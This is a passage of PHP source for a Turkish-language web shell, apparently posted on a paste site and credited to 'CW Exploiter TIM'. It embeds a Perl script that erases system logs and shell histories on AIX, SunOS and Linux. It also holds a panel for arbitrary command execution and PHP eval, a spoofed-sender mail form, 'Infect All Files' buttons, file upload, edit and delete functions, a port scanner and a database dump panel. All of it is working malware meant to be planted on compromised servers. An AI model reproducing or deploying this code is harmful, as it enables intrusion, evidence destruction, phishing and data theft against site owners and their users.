               \"/var/adm/sulog\", \"/var/adm/ras/errlog\", \"/var/adm/ras/bootlog\",
               \"/var/adm/cron/log\", \"/etc/utmp\", \"/etc/security/lastlog\",
               \"/etc/security/failedlogin\", \"usr/spool/mqueue/syslog\")   
         }

                                #Logs of SunOS Systems   
      {                     
      @sunos = (\"/var/adm/messages\", \"/var/adm/aculogs\", \"/var/adm/aculog\",
                 \"/var/adm/sulog\", \"/var/adm/vold.log\", \"/var/adm/wtmp\",
                 \"/var/adm/wtmpx\", \"/var/adm/utmp\", \"/var/adm/utmpx\",
                 \"/var/adm/log/asppp.log\", \"/var/log/syslog\",
                 \"/var/log/POPlog\", \"/var/log/authlog\", \"/var/adm/pacct\",
                 \"/var/lp/logs/lpsched\", \"/var/lp/logs/requests\",
              \"/var/cron/logs\", \"/var/saf/_log\", \"/var/saf/port/log\")
         }     

                                #Logs of Linux Systems       
      {     
       @linux = (\"/var/log/lastlog\", \"/var/log/telnetd\", \"/var/run/utmp\",
                 \"/var/log/secure\",\"/root/.ksh_history\", \"/root/.bash_history\",
                 \"/root/.bash_logut\", \"/var/log/wtmp\", \"/etc/wtmp\",
                 \"/var/run/utmp\", \"/etc/utmp\", \"/var/log\", \"/var/adm\",
                 \"/var/apache/log\", \"/var/apache/logs\", \"/usr/local/apache/logs\",
                 \"/usr/local/apache/logs\", \"/var/log/acct\", \"/var/log/xferlog\",
                 \"/var/log/messages/\", \"/var/log/proftpd/xferlog.legacy\",
                 \"/var/log/proftpd.xferlog\", \"/var/log/proftpd.access_log\",
                 \"/var/log/httpd/error_log\", \"/var/log/httpsd/ssl_log\",
                 \"/var/log/httpsd/ssl.access_log\", \"/etc/mail/access\",
                 \"/var/log/qmail\", \"/var/log/smtpd\", \"/var/log/samba\",
                 \"/var/log/samba.log.%m\", \"/var/lock/samba\", \"/root/.Xauthority\",
                 \"/var/log/poplog\", \"/var/log/news.all\", \"/var/log/spooler\",
                 \"/var/log/news\", \"/var/log/news/news\", \"/var/log/news/news.all\",
                 \"/var/log/news/news.crit\", \"/var/log/news/news.err\", \"/var/log/news/news.notice\",
                 \"/var/log/news/suck.err\", \"/var/log/news/suck.notice\",
                 \"/var/spool/tmp\", \"/var/spool/errors\", \"/var/spool/logs\", \"/var/spool/locks\",
                 \"/usr/local/www/logs/thttpd_log\", \"/var/log/thttpd_log\",
                 \"/var/log/ncftpd/misclog.txt\", \"/var/log/nctfpd.errs\",
                 \"/var/log/auth\")
         }
         
   ");
  482. $openp = fopen("logseraser.pl", "w+")or die("Error");
  483. fwrite($openp, $erase)or die("Error");
  484. fclose($openp);
  485. $aidx = passthru("perl logseraser.pl ".$_POST['functionp']);
  486. unlink("logseraser.pl");
  487. echo "</textarea>";
  488. }
  489.  
  490. if(isset($_POST['commex']))
  491. {
  492. echo "<tr><td>
  493. <center><b><font size='2' face='Verdana'>CMD :]<br></font></b>
  494.        <input name=cmd size=20 type=text>
  495.        <select name=functionz>
  496.          <option>passthru</option>
  497.          <option>popen</option>
  498.          <option>exec</option>
  499.          <option>shell_exec</option>
  500.          <option>system</option>
  501.        </select><br><input type='submit' name='cmdex' value='Enter'></table>";
  502.    }
  503.    if(isset($_POST['cmdex']))
  504.    { echo "<tr><td>";
  505.    switch (@$_POST['functionz']) {
  506.     case "system":
  507.     system(stripslashes($_POST['cmd']));
  508.    
  509.     break;
  510.     case "popen":
  511.     $handle = popen($_POST['cmd'].' 2>&1', 'r');
  512.     echo "'$handle'; " . gettype($handle) . "\n";
  513.     $read = fread($handle, 2096);
  514.     echo $read;
  515.     pclose($handle);
  516.    
  517.     break;
  518.     case "shell_exec":
  519.     shell_exec(stripslashes($_POST['cmd']));
  520.    
  521.  
  522.     break;
  523.     case "exec":
  524.     exec(stripslashes($_POST['cmd']));
  525.    
  526.     break;
  527.     case "passthru":
  528.     passthru(stripslashes($_POST['cmd']));
  529.    
  530.     }
  531.     }
  532.  
  533. elseif(isset($_POST['mail']))
  534. {
  535. echo "<form method='post' action=''>
  536. <td valign=top><center><font face='Verdana' size='2'>FakeMail [HTML Onayl�]</font></center>
  537. <center><font face='Verdana' size='1'>Kime:<br>
  538. <input type='text' size='19' name='mto'><br>
  539. Kimden:<br>
  540. <input type='text' size='19' name='mfrom'><br>
  541. Konu:<br>
  542. <input type='text' size='19' name='mobj'><br>
  543. Mesaj:<br>
  544. <textarea name='mtext' cols=20 rows=4></textarea><br>
  545. <br><input type='submit' value='Yolla' name='senm'>
  546. </form></table><br>";}
  547. if(isset($_POST['senm']))
  548. {
  549. //Mail With HTML   <- webcheatsheet.com
  550. $to = $_POST['mto'];
  551. $subject = $_POST['mobj'];
  552. $contentz = $_POST['mtext']."<!--";
  553. $random_hash = md5(date('r', time()));
  554. $headers = "From: ".$_POST['mfrom']."\r\nReply-To: ".$_POST['mfrom'];
  555. $headers .= "\r\nContent-Type: multipart/alternative; boundary=\"PHP-alt-".$random_hash."\"";
  556. ob_start();
  557. ?>
  558.  
  559. --PHP-alt-<?php echo $random_hash; ?>
  560. Content-Type: text/html; charset="iso-8859-1"
  561. Content-Transfer-Encoding: 7bit
  562.  
  563. <?  echo "$contentz"; ?>
  564. --PHP-alt-<?php echo $random_hash; ?>--
  565. <?
  566. $message = ob_get_clean();
  567.  
  568. $mail = @mail( $to, $subject, $message, $headers );
  569.  
  570. if($mail) { echo "<br><td valign=top>
  571. <center><font color='green' size='1'>Mail Sent</font></center></table>"; }
  572. else { echo "<br><td valign=top>
  573. <center><font color='red' size='1'>Error</font></center></table>"; }
  574. }
  575.  
  576. elseif(isset($_POST['encoder'])) {
  577. //Encoder
  578. echo "<form method='post' action=''><td valign=top>
  579. <center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>";
  580. }
  581. if(isset($_POST['encode'])) { echo "<td valign=top>
  582. <center><font face='Verdana' size='1'>
  583. MD5:   &nbsp;&nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".md5($_POST['encod'])."'><br>
  584. Sha1:  &nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
  585. Crc32: &nbsp;&nbsp;&nbsp;<input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
  586. Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
  587. Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
  588.  
  589. //File List
  590. echo "</table><table width=100%><tr><td>
  591. <center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
  592. <center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
  593. <font size='1'>
  594. <td valign=top><font face='Verdana' size='2'><b>Dosya Ad� :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
  595. </table></center>";
  596.  
  597. echo "
  598. <br>
  599. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
  600. <center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
  601. if(!isset($phpeval))
  602. {
  603. echo "
  604.   <form method='post' action=''>
  605.   <textarea name=php_eval cols=100 rows=5></textarea><br>
  606.   <input type='submit' value='Calistir!'>
  607.   </form>
  608. ";
  609. }
  610.  
  611. if(isset($phpeval)) {
  612. echo "
  613. <form method='post' action=''>
  614. <textarea name=php_eval cols=100 rows=10>";
  615. $wr = '"';
  616.  $eval = @str_replace("<?","",$phpeval);
  617.  $eval = @str_replace("?>","",$phpeval);
  618.  @eval($eval);
  619. echo "</textarea><br><input type='submit' value='Calistir!'></form>";
  620.  
  621. }
  622. echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
  623. if(isset($textzz)) { echo $textzz; }
  624. if(isset($textz0)) { echo $textz0; }
  625. echo "</center></form></td></tr><tr><td>
  626. <center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
  627. <form method='post' action=''>
  628. <input type='text' name='editfile' value=".$dir.">
  629. <input type='submit' value='Go' name='doedit'>
  630. </form>";
  631. // Edit Files n3xpl0rer
  632. if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
  633. {
  634. $file = $_POST['editfile'];
  635. $content = file_get_contents($file);
  636. echo "<form action='' method='post'><center>
  637. <input type='hidden' name='editfile' value='".$file."'>
  638. <textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
  639. }
  640. if(isset($_POST['edit'])) {
  641. $file = $_POST['editfile'];
  642. echo  $file."<br />";
  643. $fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
  644. fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
  645. fclose($fh);
  646. echo "Done.</td></tr>";
  647. }
  648. echo "
  649. </table>
  650. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  651. <tr>
  652. <td valign=top>
  653. <center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
  654. <form name='directory' method='post' action=''>
  655. <input type='text' name='dir' value=$dir>
  656. <input type='submit' value='Go'>
  657. </form></td><td>
  658. <center><b><font size='2' face='Verdana'> Port Taray�c� <br></font></b>
  659.   <form name='scanner' method='post'>
  660.   <input type='text' name='host' value='127.0.0.1' >
  661.   <select name='protocol'>
  662.   <option value='tcp'>tcp</option>
  663.   <option value='udp'>udp</option>
  664.   </select>
  665.   <input type='submit' value='Portlar� TARA'>
  666.   </form>
  667. ";
  668. if(isset($host) && isset($proto))
  669. {
  670. echo "<font size='2' face='Verdana'>Open Ports:";
  671.  
  672. for($current = 0; $current <= 23; $current++)
  673. {
  674. $currents = $myports[$current];
  675.  
  676. $service = getservbyport($currents, $proto);
  677.  
  678.  
  679. // Try to connect to port
  680. $result = fsockopen($host, $currents, $errno, $errstr, 1);
  681.  
  682. // Show results
  683. if($result)
  684. {
  685. echo "$currents, ";
  686. }
  687.  
  688.  
  689. }
  690. }
  691.  
  692. echo "</font>
  693. </td></tr>
  694.  
  695. <tr>
  696. <td valign=top width=50%>
  697. <center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
  698.   <form method='post' action='' enctype='multipart/form-data'>
  699.   <input type='hidden' name='dare' value=$dir>
  700.   <input type='file' name='ffile'>
  701.   <input type='submit' name='ok' value='Upload!'>
  702.   </center>  
  703.   </form>
  704. </td>
  705. <td valign=top>
  706. <center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
  707.   <form method='post' action=''>
  708.   <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyay� Sil' name='deletfilez'>
  709.   </center>
  710.   </form>
  711. </td></tr>
  712. <tr>
  713. <td valign=top>
  714.  
  715. <center><b><font size='2' face='Verdana'>Klas�r Olu�tur<br></font></b>
  716.   <form method='post' action=''>
  717.   <input type='text' name='makedir' value=$dir> <input type='submit' value='Olu�tur'>
  718.   </center>
  719.   </form>
  720. </td>
  721. <td valign=top>
  722. <center><b><font size='2' face='Verdana'>Klas�r Sil<br></font></b>
  723.   <form method='post' action=''>
  724.   <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
  725.   </center>
  726.   </form>
  727. </td></tr>
  728. <tr>
  729. <td valign=top width=50%>
  730. <center><b><font size='2' face='Verdana'>Dosya Olu�tur:<br></font></b>
  731.   <form method='post' action=''>
  732.   <input type='hidden' name='darezz' value=$dir>
  733.   <font size='1' face='Verdana'>ADI:</font><br>
  734.   <input type='text' name='names' size='30'><br>
  735.   <font size='1' face='Verdana'>Kodu:</font><br>
  736.   <textarea rows='16' cols='30' name='source'></textarea><br>
  737.   <input type='submit' value='Upload'>
  738.   </center>
  739.   </form>
  740. </td>
  741. <td valign=top width=50%>
  742. <center><b><font size='2' face='Verdana'>Database<br></font></b>
  743.   <form method='post' action=''>
  744.   <font size='1' face='Verdana'>Username: - Password:</font><br>
  745.   <input type='text' name='user' size='10'>
  746.   <input type='text' name='passd' size='10'><br>
  747.   <font size='1' face='Verdana'>Host:</font><br>
  748.   <input type='text' name='host' value='localhost'><br>
  749.   <font size='1' face='Verdana'>DB Name:</font><br>
  750.   <input type='text' name='db'><br>
  751.   <font size='1' face='Verdana'>Sorgu:</font><br>
  752.   <textarea rows='10' cols='30' name='query'></textarea><br>
  753.   <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
  754.   </center>
  755.   </form>
  756. </td> </tr>
  757.  
  758. </table>
  759. </table>
  760. <br />
  761. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  762. <tr>
  763. <td valign=top>
  764. <center><b><font size='1' face='Verdana'>
  765. CW Exploiter TIM // Cyber Security
  766. </center></font></td></tr>
  767. </body>
  768. </html>";
  769.  
  770.  
  771. ?>
Add Comment
Please, Sign In to add comment